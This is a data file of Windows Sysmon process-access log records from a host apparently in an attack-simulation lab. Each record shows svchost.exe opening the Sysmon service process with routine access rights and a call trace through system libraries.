{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1595,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.818\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.818","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1596,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.818\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.818","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1597,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.818\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.818","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1598,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.818\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.818","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1599,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.818\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.818","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1600,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.833\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.833","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1601,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.833\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.833","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1602,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.833\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.833","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
